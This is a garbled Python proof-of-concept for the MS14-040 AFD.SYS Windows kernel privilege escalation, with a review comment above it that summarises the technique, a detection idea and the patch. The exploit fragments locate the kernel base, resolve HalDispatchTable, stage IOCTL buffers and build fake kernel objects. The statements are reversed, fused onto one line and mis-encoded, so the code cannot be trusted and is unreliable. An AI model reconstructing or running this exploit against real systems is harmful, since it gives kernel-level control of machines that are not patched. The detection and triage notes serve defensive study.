
# NOTE(review): this listing is a damaged extraction of a public
# proof-of-concept; its own header comment names MS14-040 (AFD.SYS dangling
# pointer) on Windows 7, 64 bit. The statements are fused onto one line and
# appear in reverse of normal file order (the title comment and the ctypes
# import come last). The first character of many statements has been
# capitalised or mis-encoded ("ĭef" for "def", "įrom" for "from",
# "Kernel32" next to "kernel32"). It is not valid Python as shown; read it
# as a record of technique rather than as runnable code.
#
# What the visible fragments establish, for triage and detection:
#   - Kernel image discovery from user mode: Psapi.EnumDeviceDrivers and
#     Psapi.GetDeviceDriverBaseNameA, matched on a base name containing "krnl".
#   - The kernel image is mapped into the calling process with
#     LoadLibraryExA(kernelver, 0, 1) (flag 1 is DONT_RESOLVE_DLL_REFERENCES)
#     and GetProcAddress is asked for 'HalDispatchTable'.
#   - Two AFD control codes appear in the log strings: 0x1207F
#     (afdTransmitFile) and 0x120C3 (afdTransmitPacket).
#   - WriteProcessMemory and NtAllocateVirtualMemory are called with -1, the
#     current-process pseudo-handle, so the buffers are staged in the
#     script's own address space.
# A non-system process that combines driver enumeration, a data-only load of
# the kernel image and a HalDispatchTable lookup is worth alerting on.
# The fix for the underlying flaw is the MS14-040 security update.
Kernel32.WriteProcessMemory(-1, fakeobject2addr, fakeobject2, fakeobj2size, byref(written))

Print " Print creating fakeobject at ", hex(fakeobjectaddr)įakeobject2addr = setinfoworkerfactory - 0x18įakeobject2 = "\x00"*0x18 + struct.pack("Q", firstWrite) Kernel32.WriteProcessMemory(-1, inbuf2addr, inbuf2, inbuf2size, byref(written))ĭef CreateFakeObject(firstWrite,fakeobjectaddr, setinfoworkerfactory): Print " Creating Buffer for IOCTL 0x120C3 (afdTransmitPacket) at: ", hex(inbuf2addr) WpmStatus = kernel32.WriteProcessMemory(-1, inbuf1addr, inbuf1, inbuf1size, byref(written)) Inbuf1 += "\x00" * (inbuf1size - len(inbuf1))ĭwStatus = ntdll.NtAllocateVirtualMemory(-1, Inbuf1 += struct.pack("Q", virtualAddress) #0x1a Mdlsize = (pow(2, 0x0c) * (targetsize -0x30) / 8) - 0xfff - (virtualAddress & 0xfff) Print " Creating Buffer for IOCTL 0x1207F (afdTransmitFile) at: ", hex(inbuf1addr) HalDispatchTable = kernel32.GetProcAddress(hKernel, 'HalDispatchTable') HKernel = kernel32.LoadLibraryExA(kernelver, 0, 1) (krnlbase, kernelver) = find_driver_base() If driver = None and driver_().find("krnl") != -1:Įlif driver_() = driver: Psapi.GetDeviceDriverBaseNameA(base_addr, driver_name, driver_name_size.value) Psapi.EnumDeviceDrivers(byref(lpImageBase), c_int(1024), byref(lpcbNeeded))ĭriver_name = c_char_p('\x00' * driver_name_size.value) # raise RuntimeError('python running in WOW64 is not supported') WSASocket.argtypes = (c_int, c_int, c_int, c_void_p, c_uint, DWORD)Ĭonnect.argtypes = (SOCKET, c_void_p, c_int) WSAGetLastError = windll.Ws2_32.WSAGetLastError # Vendor Homepage: # Version: Windows 7, 64 bitįrom ctypes.wintypes import HANDLE, DWORD # Exploit Title: MS14-040 - AFD.SYS Dangling Pointer
